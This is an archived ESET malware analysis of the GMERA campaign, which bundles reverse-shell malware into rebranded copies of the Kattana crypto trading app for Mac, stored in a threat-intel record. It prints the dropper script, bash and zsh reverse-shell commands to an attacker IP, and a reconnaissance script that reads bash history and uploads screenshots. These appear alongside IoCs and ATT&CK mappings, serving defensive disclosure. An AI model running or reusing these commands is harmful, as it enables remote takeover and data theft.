{
	"id": "aab16c2f-2ee2-4655-ba24-6be790e754dd",
	"created_at": "2026-04-06T00:14:29.587948Z",
	"updated_at": "2026-04-10T03:21:07.240842Z",
	"deleted_at": null,
	"sha1_hash": "89d86c33316045ec083184e9a21d10eec107d398",
	"title": "Mac cryptocurrency trading application rebranded, bundled with malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2057082,
	"plain_text": "Mac cryptocurrency trading application rebranded, bundled with\r\nmalware\r\nBy Marc-Etienne M.Léveillé\r\nArchived: 2026-04-05 14:33:14 UTC\r\nWe’ve recently discovered websites distributing malicious cryptocurrency trading applications for Mac. This malware is\r\nused to steal information such as browser cookies, cryptocurrency wallets and screen captures. Analyzing the malware\r\nsamples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA, in an analysis\r\nthey published in September 2019. As in the previous campaigns, the malware reports to a C\u0026C server over HTTP and\r\nconnects remote terminal sessions to another C\u0026C server using a hardcoded IP address. This time, however, not only did the\r\nmalware authors wrap the original, legitimate application to include malware; they also rebranded the Kattana trading\r\napplication with new names and copied its original website. We have seen the following fictitious brandings used in\r\ndifferent campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus. In addition to the analysis of the malware code, ESET\r\nresearchers have also set up honeypots to try to reveal the motivations behind this group of criminals.\r\nDistribution\r\nWe have not yet been able to find exactly where these trojanized applications are promoted. However, in March 2020,\r\nKattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized\r\napp. We couldn’t confirm that it was linked to this particular campaign, but it could very well be the case.\r\nFigure 1. Kattana warns about trojanized copies of their software on Twitter\r\nCopycat websites are set up to make the bogus application download look legitimate. For a person who doesn’t know\r\nKattana, the websites do look legitimate.\r\nThe download button on the bogus sites is a link to a ZIP archive containing the trojanized application bundle.\r\nAnalysis\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 1 of 13\n\nMalware analysis in this case is pretty straightforward. We will take the Licatrade sample as the example here. Other\r\nsamples have minor differences, but the ideas and functionalities are essentially the same. Similar analyses of earlier\r\nGMERA campaigns are provided in Trend Micro’s blogpost and in Objective-See’s Mac malware of 2019 report.\r\nFigure 4. Content of the Licatrade application bundle\r\nModification timestamps of the files in the ZIP archive, the date the application was signed, and the Last‑Modified HTTP\r\nheader when we downloaded the archive all show April 15th, 2020. This is highly suggestive that this campaign started on\r\nthat date.\r\nA shell script (run.sh) is included in the resources of the application bundle. This main executable, written in Swift, launches\r\nrun.sh. For some reason, the malware author has duplicated functionality to send a simple report to a C\u0026C server over\r\nHTTP, and to connect to a remote host via TCP providing a remote shell to the attackers, in both the main executable and the\r\nshell script. An additional functionality, in the shell script only, is to set up persistence by installing a Launch Agent.\r\nHere is the full shell script source (ellipsis in long string and defanged):\r\n#! /bin/bash\r\nfunction remove_spec_char(){\r\necho \"$1\" | tr -dc '[:alnum:].\\r' | tr '[:upper:]' '[:lower:]'\r\n}\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 2 of 13\n\nwhoami=\"$(remove_spec_char `whoami`)\"\r\nip=\"$(remove_spec_char `curl -s ipecho.net/plain`)\"\r\nreq=`curl -ks \"http://stepbystepby[.]com/link.php?${whoami}\u0026${ip}\"`\r\nplist_text=\"ZWNobyAnc2R2a21…d2Vpdm5laXZuZSc=\"\r\necho \"$plist_text\" | base64 --decode \u003e \"/tmp/.com.apple.system.plist\"\r\ncp \"/tmp/.com.apple.system.plist\" \"$HOME/Library/LaunchAgents/.com.apple.system.plist\"\r\nlaunchctl load \"/tmp/.com.apple.system.plist\"\r\nscre=`screen -d -m bash -c 'bash -i \u003e/dev/tcp/193.37.212[.]97/25733 0\u003e\u00261'`\r\nIt’s interesting to note that persistence is broken in the Licatrade sample: the content of the resulting Launch Agent file\r\n(.com.apple.system.plist) isn’t in Property List format as launchd expects, but instead is the command line to be executed.\r\nThe decoded content (ellipses in long strings) of the $plist_text variable is:\r\necho 'sdvkmsdfmsd…kxweivneivne'; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m\r\nIf run directly, this code would open a reverse shell from the victim machine to an attacker-controlled server, but that fails\r\nhere. Fortunately for the attackers, the last line of the shell script also starts a reverse shell to their server.\r\nThe Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed\r\nand successfully starts when the user logs in.\r\nThe various reverse shells used by these malware operators connect to different remote ports depending on how they were\r\nstarted. All connections are unencrypted. Here is a list of ports, based on the Licatrade sample.\r\nTCP Port Where How\r\n25733\r\nLicatrade executable zsh in screen using ztcp\r\nrun.sh bash in screen using /dev/tcp\r\nLaunch Agent (Not working) bash in screen using /dev/tcp\r\n25734 Licatrade executable zsh using ztcp\r\n25735 Licatrade executable bash using /dev/tcp\r\n25736 Licatrade executable bash in screen using /dev/tcp\r\n25737 Licatrade executable bash in screen using /dev/tcp\r\n25738 Licatrade executable zsh in screen using ztcp\r\nHere are some example command lines used:\r\nBash in screen using /dev/tcp:\r\nscreen -d -m bash -c 'bash -i \u003e/dev/tcp/193.37.212[.]97/25733 0\u003e\u00261'\r\nzsh using ztcp:\r\nzsh -c 'zmodload zsh/net/tcp \u0026\u0026 ztcp 193.37.212[.]97 25734 \u0026\u0026 zsh \u003e\u0026$REPLY 2\u003e\u0026$REPLY 0\u003e\u0026$REPLY'\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 3 of 13\n\nThe rebranded Kattana application is also in the resources of the application bundle. We wanted to see if, besides the change\r\nin name and icon in the application, some other code was changed. Since Kattana asks for credentials for trading platforms\r\nto perform trading, we verified if the input fields of these were tampered with and if credentials were exfiltrated in some\r\nway. Kattana is built with Electron, and Electron apps have an app.asar file, which is an archive containing the JavaScript\r\ncode of the application. We have checked all changes between the original Kattana application and the malicious Licatrade\r\ncopycat and found that only strings and images were changed.\r\nFigure 5. Partial difference between Kattana and Licatrade\r\nLicatrade and its resources were all signed using the same certificate, having the common name field set to Andrey\r\nNovoselov and using developer ID M8WVDT659T. The certificate was issued by Apple on April 6th, 2020. It was revoked\r\nthe same day we notified Apple about this malicious application.\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 4 of 13\n\nFigure 6. Certificate used to sign Licatrade\r\nFigure 7. Licatrade certificate was revoked May 28th, 2020\r\nFor each of the other campaigns we analyzed, a different certificate was used. Both were already revoked by Apple when we\r\nstarted our analyses. See the IoCs section for details about these. It’s interesting to note that in the case of Cointrazer, there\r\nwere only 15 minutes between the moment the certificate was issued by Apple and the malefactors signing their trojanized\r\napplication. This, and the fact that we didn’t find anything else signed with the same key, suggests they got the certificate\r\nexplicitly for that purpose.\r\nInfrastructure\r\nThe malicious Licatrade application was available on the licatrade.com website and its C\u0026C HTTP report server domain is\r\nstepbystepby.com. Both domains were registered using the levistor777@gmail.com email address. Searching for other\r\ndomains registered with that email address reveals what looks like several previous campaigns. Here is a list of domains we\r\nfound in samples or registered with that email address.\r\nDomain name Registration date Comment\r\nrepbaerray.pw 2019-02-25 C\u0026C server for HTTP report of Stockfolio app\r\nmacstockfolio.com 2019-03-03 Website distributing the malicious Stockfolio app\r\nlatinumtrade.com 2019-07-25 Website distributing the malicious Latinum app\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 5 of 13\n\nDomain name Registration date Comment\r\ntrezarus.com 2019-06-03 Website distributing the malicious Trezarus app\r\ntrezarus.net 2019-08-07 #rowspan#\r\ncointrazer.com 2019-08-18 Website distributing the malicious Cointrazer app\r\napperdenta.com 2019-08-18 Usage unknown\r\nnarudina.com 2019-09-23 Usage unknown\r\nnagsrsdfsudinasa.com 2019-10-09 C\u0026C server for HTTP report of Cointrazer app\r\ncupatrade.com 2020-03-28 Website distributing the malicious Cupatrade app\r\nstepbystepby.com 2020-04-07 C\u0026C server for HTTP report of Licatrade app\r\nlicatrade.com 2020-04-13 Website distributing the malicious Licatrade app\r\ncreditfinelor.com 2020-05-29 Empty page, usage unknown\r\nmaccatreck.com 2020-05-29 Some authentication form\r\nBoth the websites and HTTP C\u0026C servers receiving the malware’s first report are hosted behind Cloudflare.\r\nHoneypot interactions\r\nTo learn more about the intentions of this group, we set up honeypots where we monitored all interactions between the\r\nGMERA reverse shell backdoors and the operators of this malware.\r\nWe saw no C\u0026C commands issued via the HTTP C\u0026C server channel; everything happened through the reverse shells.\r\nWhen it first connected, the C\u0026C server sent a small script to gather the username, the macOS version and location (based\r\non external IP address) of the compromised device.\r\n#! /bin/bash\r\nfunction check() {\r\n if [ ! -f /private/var/tmp/.i ]; then\r\n write\r\n else\r\n if [ \"$(( $(date +\"%s\") - $(stat -f \"%m\" /private/var/tmp/.i) ))\" -gt \"21600\" ]; then\r\n write\r\n fi\r\n fi\r\n}\r\nfunction write() {\r\n getit=`curl -s ipinfo.io | grep -e country -e city | sed 's/[^a-zA-Z0-9]//g' | sed -e \"s/city//g;s/country//g\"`\r\n echo `whoami` \u003e /private/var/tmp/.i\r\n echo `sw_vers -productVersion` \u003e\u003e /private/var/tmp/.i\r\n echo \"$getit\" \u003e\u003e /private/var/tmp/.i\r\n}\r\ncheck\r\ncat /private/var/tmp/.i\r\nwhich sent something like this to the operators:\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 6 of 13\n\njeremy\r\n10.13.4\r\nBratislava\r\nSK\r\nThe TCP connection stays open and waits for further commands. In our case, after a while, the operators manually inspected\r\nthe machine. Across several of our honeypots, the commands used to perform that inspection varied. Part of it was just\r\nlisting files across the file system. Sometimes, they would copy-and-paste a base64-encoded script designed to list\r\ninformation to reveal whether the system is a honeypot or actually interesting. The script is decoded, then piped to bash.\r\nFigure 8. Packet capture of the operator sending the base64-encoded secondary reconnaissance script\r\nHere is the decoded script:\r\necho \"\"\r\necho \"------ Whoami ------\"\r\nwhoami\r\necho \"------ IP info ------\"\r\ncurl -s ipinfo.io\r\necho \"------ Mac Model ------\"\r\ncurl -s https://support-sp.apple.com/sp/product?cc=$(system_profiler SPHardwareDataType | awk '/Serial/ {print $4}' | cut\r\necho \"------ MacOS Version ------\"\r\nsw_vers -productVersion\r\nsw_vers -productVersion | grep -E \"10.15.*\" \u0026\u0026 echo -e \"\\033[1;31m CATALINA CATALINA CATALINA CATALINA CATALINA CATALINA C\r\nsleep 1\r\necho \"------ MacOS Installed ------\"\r\ndate -r /var/db/.AppleSetupDone\r\necho \"------ Disks ------\"\r\ndf -m\r\necho \"------ Video Output ------\"\r\nsystem_profiler SPDisplaysDataType\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 7 of 13\n\necho \"------ Wifi Around ------\"\r\n/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s\r\necho \"------ Virtual Mashine Detector ------\"\r\nioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -E \"irtual|racle|ware|arallels\" || echo \"Probably not a Virtual Ma\r\necho \"--------------------------------\"\r\necho \"------ Developer Detector ------\"\r\necho \"--------------------------------\"\r\necho \"||| Applications |||\"\r\nls -laht /Applications | grep -E \"Xcode|ublime|ourceTree|Atom|MAMP|TextWrangler|Code|ashcode\" \u0026\u0026 echo \"-|Be Carefull|-\"\r\necho \"||| Short Bash History |||\"\r\ncat ~/.bash_history | head -n 20\r\necho \"------ Desktop Screen ------\"\r\necho \"create screenshot...\"\r\nsw_vers -productVersion | grep -E \"10.15.*\" \u0026 screencapture -t jpg -x /tmp/screen.jpg \u0026\u003e /dev/null\r\nsips -z 500 800 /tmp/screen.jpg \u0026\u003e /dev/null\r\nsips -s formatOptions 50 /tmp/screen.jpg \u0026\u003e /dev/null\r\necho \"uploading...\"\r\ncurl -s -F \"file=@/tmp/screen.jpg\" https://file.io\r\nThis script is actually very similar of the plugin file found in one of the Stockfolio samples analyzed last year. However, in\r\nthe more recent campaigns, they chose to send the reconnaissance script over the network to interesting victims only. It was\r\nalso updated to include some additional information.\r\nFigure 9. Report output that would be seen on an operator's terminal (reconstructed from packet capture)\r\nWe’ll go over each section of the script here:\r\nIt gets the full report about the external IP from ipinfo.io\r\nIt checks for Mac model by using the last 4 digits of the Mac serial number and an HTTP service provided by Apple\r\nto translate it to a friendly name such as “MacBook Pro (Retina, 15-inch, Late 2013)”. Virtual machines likely have\r\ninvalid serial numbers and may not display a model here.\r\nIt outputs the version of macOS installed. There is a rather big red (using ANSI escape sequence), all caps warning\r\nwhen the computer is running macOS Catalina (10.15). We think we understand why and talk about it later.\r\nIt checks when macOS was installed using the modification time of the /var/db/.AppleSetupDone.\r\nIt outputs the disk usage and connected monitors’ details.\r\nIt lists available Wi-Fi networks. Honeypots are likely to have Wi-Fi disabled.\r\nIt detects whether the computer is a VMware, Parallels or VirtualBox virtual machine by looking at the vendor strings\r\nof connected devices.\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 8 of 13\n\nIt checks whether common text editors or IDE applications are installed and warns operators to “Be Carefull” (sic)\r\nbecause this victim could be more computer savvy than usual.\r\nIt gets the first (i.e. oldest) 20 commands from the bash history file.\r\nFinally, it takes a screenshot, resizes it and uploads it to file.io. It checks to see whether the system is running macOS\r\nCatalina before doing so, but an error in the script makes this check useless. The “\u0026” control operator, which starts\r\ncommands in parallel, is used instead of the logical AND (“\u0026\u0026”) operator. This means the screen capture is taken\r\nregardless of the macOS version.\r\nThe fact that a screenshot should not be taken on Catalina and that an obvious warning sign will be displayed on the\r\noperator’s terminal made us wonder why they act differently on the current macOS version. It turns out that Catalina added a\r\nfeature where recording the screen or taking a screenshot must be approved by the user for each application. We tested\r\ntaking a screenshot from the reverse shell on Catalina and ended up with the following warning in our sandbox, which is\r\nrather suspicious considering a trading application has no business doing so.\r\nFigure 10. macOS Catalina warning should the operators try taking a screenshot\r\nShould a compromised system be considered interesting, the exfiltration phase begins. Interesting files are compressed into a\r\nZIP archive and uploaded via HTTP to yet another server, also under the control of the attackers.\r\nFigure 11. Packet capture of an operator using the reverse shell to exfiltrate browser cookies\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 9 of 13\n\nIt’s funny to note here the /tmp/h.zip file did not exist. Perhaps they copy-and-pasted some command that was used for\r\nanother victim.\r\nBased on the activity we have witnessed, we conclude that some of the interests of the operators of this malware are:\r\nBrowser information (cookies, history)\r\nCryptocurrency wallets\r\nScreen captures\r\nConclusion\r\nThe numerous campaigns run by this group show how much effort they’ve expended over the last year to compromise Mac\r\nusers doing online trading. We still aren’t sure how someone becomes a victim, downloading one of the trojanized\r\napplications, but the hypothesis of the operators directly contacting their targets and socially engineering them into installing\r\nthe malicious application seems the most plausible.\r\nIt is interesting to note how the malware operation is more limited on the most recent version macOS. We did not see the\r\noperators try to circumvent the limitation surrounding screen captures. Further, we believe that the only way that they could\r\nsee the computer screen on victim machines running Catalina would be to exfiltrate existing screenshots taken by the victim.\r\nThis is a good, real-world example of a mitigation implementation in the operating system that has worked to limit the\r\nactivities of malefactors.\r\nIndicators of Compromise (IoCs)\r\nSamples\r\nSHA-1 Filename\r\nESET\r\ndetection\r\nname\r\n2AC42D9A11B67E8AF7B610AA59AADCF1BD5EDE3B Licatrade.zip multiple threat\r\n560071EF47FE5417FFF62CB5C0E33B0757D197FA Licatrade.app/Contents/Resources/run.sh OSX/Agent.BA\r\n4C688493958CC7CCCFCB246E706184DD7E2049CE Licatrade.app/Contents/MacOS/Licatrade OSX/Agent.BA\r\n9C0D839D1F3DA0577A123531E5B4503587D62229 Cointrazer.zip multiple threat\r\nDA1FDA04D4149EBF93756BCEF758EB860D0791B0 Cointrazer.app/Contents/Resources/nytyntrun.sh OSX/Agent.A\r\nF6CD98A16E8CC2DD3CA1592D9911489BB20D1380 Cointrazer.app/Contents/MacOS/Cointrazer OSX/Agent.BA\r\n575A43504F79297CBFA900B55C12DC83C2819B46 Stockfolio.zip multiple threat\r\nB8F19B02F9218A8DD803DA1F8650195833057E2C Stockfolio.app/Contents/MacOS/Stockfoli OSX/Agent.A\r\nAF65B1A945B517C4D8BAAA706AA19237F036F023 Stockfolio.app/Contents/Resources/run.sh OSX/Agent.A\r\nCode signing certificate\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 10 of 13\n\nApp\r\nname\r\nFingerprint (SHA-1)\r\nDeveloper\r\nidentity\r\nValid\r\nfrom\r\nApp\r\nsigned\r\non\r\nRevoked\r\non\r\nStockfolio E5D2C7FB4A64EAF444728E5C61F576FF178C5EBF\r\nLevis Toretto\r\n(9T4J9V8NV5)\r\n2018-\r\n11-25\r\n2019-\r\n04-18\r\n2019-07-\r\n26\r\nCointrazer 1BC8EA284F9CE5F5F68C68531A410BCC1CE54A55\r\nAndrei Sobolev\r\n(A265HSB92F)\r\n2019-\r\n10-17\r\n2019-\r\n10-17\r\n2020-04-\r\n16\r\nLicatrade BDBD92BFF8E349452B07E5F1D2883678658404A3\r\nAndrey\r\nNovoselov\r\n(M8WVDT659T)\r\n2020-\r\n04-06\r\n2020-\r\n04-15\r\n2020-05-\r\n28\r\nNetwork\r\nDomain names\r\n• repbaerray.pw\r\n• macstockfolio.com\r\n• latinumtrade.com\r\n• trezarus.com\r\n• trezarus.net\r\n• cointrazer.com\r\n• apperdenta.com\r\n• narudina.com\r\n• nagsrsdfsudinasa.com\r\n• cupatrade.com\r\n• stepbystepby.com\r\n• licatrade.com\r\n• creditfinelor.com\r\n• maccatreck.com\r\nIP addresses\r\n• 85.209.88.123\r\n• 85.217.171.87\r\n• 193.37.214.7\r\n• 193.37.212.97\r\nHost-based indicators\r\nFile paths\r\n• $HOME/Library/LaunchAgents/.com.apple.upd.plist\r\n• $HOME/Library/LaunchAgents/.com.apple.system.plist\r\n• /tmp/.fil.sh\r\n• /tmp/loglog\r\nLaunch Agent labels\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 11 of 13\n\n• com.apple.apps.upd\r\n• com.apples.apps.upd\r\nMITRE ATT\u0026CK techniques\r\nNote: This table was built using version 6 of the ATT\u0026CK framework.\r\nTactic ID Name Description\r\nExecution\r\nT1204 User Execution\r\nVictim needs to run the malicious application to be\r\ncompromised.\r\nT1059 Command-Line Interface\r\nGMERA provides reverse bash and zsh shells to its\r\noperators.\r\nPersistence T1159 Launch Agent GMERA installs a Launch Agent to maintain persistence.\r\nDefense\r\nEvasion\r\nT1116 Code Signing\r\nAll samples of GMERA we have analyzed were signed\r\nand used valid, Apple-signed (now revoked), certificates.\r\nCredential\r\nAccess\r\nT1139 Bash History\r\nA GMERA reconnaissance script lists the first 20 lines of\r\nthe .bash_history file.\r\nT1539 Steal Web Session Cookie\r\nGMERA’s operators steal browser cookies via a reverse\r\nshell.\r\nDiscovery\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nGMERA’s operators list files on the target system via a\r\nreverse shell and ls .\r\nT1497\r\nVirtualization/Sandbox\r\nEvasion\r\nA GMERA reconnaissance script checks for devices\r\nspecific to hypervisors and warns the operators if run in a\r\nvirtual machine.\r\nT1040 Network Sniffing\r\nA GMERA reconnaissance script lists Wi-Fi networks\r\navailable to the compromised Mac using airport -s .\r\nT1082\r\nSystem Information\r\nDiscovery\r\nA GMERA reconnaissance script lists information about\r\nthe system such as macOS version, attached displays and\r\nMac model.\r\nT1518 Software Discovery\r\nA GMERA reconnaissance script checks whether\r\ndeveloper tools are installed.\r\nCollection\r\nT1005 Data from Local System\r\nGMERA’s operators use this malware to exfiltrate files\r\nfrom the compromised system.\r\nT1113 Screen Capture\r\nGMERA’s operators take screenshots of the compromised\r\nsystem and exfiltrate them through file.io.\r\nCommand and\r\nControl\r\nT1043 Commonly Used Port\r\nInitial reporting from the malware is done using HTTP on\r\nits standard TCP port (80).\r\nT1065 Uncommonly Used Port\r\nGMERA reverse shells are opened by connecting to C\u0026C\r\nserver TCP ports in the range 25733 to 25738.\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 12 of 13\n\nTactic ID Name Description\r\nExfiltration T1048\r\nExfiltration Over Alternative\r\nProtocol\r\nGMERA exfiltrates files from the reverse shell using\r\nHTTP to another attacker-controlled server.\r\nSource: https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nhttps://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/"
	],
	"report_names": [
		"mac-cryptocurrency-trading-application-rebranded-bundled-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434469,
	"ts_updated_at": 1775791267,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/89d86c33316045ec083184e9a21d10eec107d398.pdf",
		"text": "https://archive.orkl.eu/89d86c33316045ec083184e9a21d10eec107d398.txt",
		"img": "https://archive.orkl.eu/89d86c33316045ec083184e9a21d10eec107d398.jpg"
	}
}